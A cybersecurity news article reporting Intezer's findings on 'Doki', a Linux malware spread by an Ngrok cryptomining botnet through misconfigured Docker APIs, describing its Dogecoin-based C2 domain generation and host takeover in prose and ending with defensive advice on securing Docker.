What is Docker?
Docker is a popular platform as a service (PaaS) solution for Linux and Windows designed to make it easier for developers to create, test, and run their applications in a loosely isolated environment called a container.
According to the latest research shared by Intezer, this is an ongoing Ngrok mining botnet campaign that scans the Internet for misconfigured Docker API endpoints and has already infected many vulnerable servers with new malware.
While the Ngrok mining botnet has been active for the past two years, the new campaign focuses primarily on taking control of misconfigured Docker servers and exploiting them to set up malicious containers with cryptominers running on the victims' infrastructure.
Dubbed "Doki," the new multi-threaded malware leverages "an undocumented method to contact its operator by abusing the Dogecoin cryptocurrency blockchain in a unique way to dynamically generate its C2 domain address, despite samples being publicly available on VirusTotal."
Key Findings
According to researchers, the malware:
- was designed to execute commands received from its operators
- uses a Dogecoin cryptocurrency block explorer to dynamically generate its C2 domain in real time,
- uses the embedTLS library for cryptographic functions and network communication,
- creates unique URLs with a short lifespan and uses them to download payloads during the attack.
"The malware uses the DynDNS service and a unique domain generation algorithm (DGA) based on the Dogecoin cryptocurrency blockchain to find its C2 domain in real time."In addition to this, the attackers behind this new campaign have also managed to compromise host machines by binding newly created containers to the server's root directory, allowing them to access or modify any file on the system.
"By using the bind configuration, the attacker can control the host's cron utility. The attacker modifies the host's cron to execute the downloaded payload every minute.""This attack is very dangerous because the attacker uses container escape techniques to gain full control of the victim's infrastructure."Once this is done, the malware also leverages the compromised systems to further scan the network for ports associated with Redis, Docker, SSH, and HTTP, using scanning tools such as zmap, zgrap, and jq.
Recent Attacks on Docker Servers
Doki managed to stay off the radar for more than six months despite having been uploaded to VirusTotal on January 14, 2020, and scanned multiple times since then. Remarkably, at the time of writing, it is still undetectable by any of the 61 leading malware detection engines.
(adsbygoogle = window.adsbygoogle || []).push({});
The most prominent container software was attacked for the second time in a month. Late last month, malicious actors were found targeting exposed Docker API endpoints and creating malware-laden images to facilitate DDoS attacks and mine cryptocurrency.
Cybersecurity researchers discovered a fully undetectable Linux malware that exploits undocumented techniques to stay under the radar and targets publicly accessible Docker servers hosted on popular cloud platforms, including AWS, Azure, and Alibaba Cloud.
Users and organizations running Docker instances are advised not to expose Docker APIs to the Internet, but if you still need to do so, make sure it is accessible only from a trusted network or VPN, and only to trusted users who control your Docker daemon.
If you manage Docker from a web server to provision containers through an API, you should be even more careful than usual with parameter validation to ensure that a malicious user cannot pass crafted parameters that cause Docker to create arbitrary containers.
Follow the Docker security best practices here.
Leave a Comment
Comments are reviewed before publishing.